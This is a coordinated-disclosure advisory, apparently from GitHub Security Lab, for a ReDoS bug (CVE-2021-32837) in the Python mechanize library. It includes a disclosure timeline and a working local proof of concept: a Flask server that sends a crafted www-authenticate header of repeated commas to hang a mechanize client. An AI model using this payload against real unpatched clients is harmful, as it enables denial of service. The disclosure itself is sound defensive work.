Coordinated Disclosure Timeline
- 2021-08-31: Created issue asking for contact details.
- 2021-08-31: They added a security policy and closed the issue. I sent the report to kovid@kovidgoyal.net
- 2021-08-31: Issue is fixed by @kovidgoyal.
- 2021-08-31: Emailed kovid@kovidgoyal.net to ask if there will a new release of mechanize and whether there will be an advisory.
- 2021-09-01: Reply from kovid@kovidgoyal.net: “New version released”
Summary
mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
mechanize
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the query on mechanize here.
Vulnerability
The vulnerable regular expression is here.
mechanize is a library for automatically interacting with HTTP web servers. If the webserver responds in a malicious way, then mechanize could crash.
The reproduction steps below first start a webserver, and then starts mechanize
.
You can try to delete the resp.headers[...
line to see how mechanize
should behave.
- Install mechanize and flask:
pip3 install mechanize flask
- Run the server below with
python3
:
from flask import Flask, make_response
app = Flask(__name__)
@app.route("/")
def home():
resp = make_response("401 Unauthorized")
resp.status_code = 401
resp.headers["www-authenticate"] = ",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"
return resp
if __name__ == "__main__":
app.run(debug=True, port=8080)
- Leave the above server running while doing the next steps.
- Run the below with
python3
:
import mechanize
br = mechanize.Browser()
br.add_password("http://localhost:8080", "admin", "password")
br.open("http://localhost:8080")
Impact
This issue may lead to a denial of service.
CVE
- CVE-2021-32837
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2021-108
in any communication regarding this issue.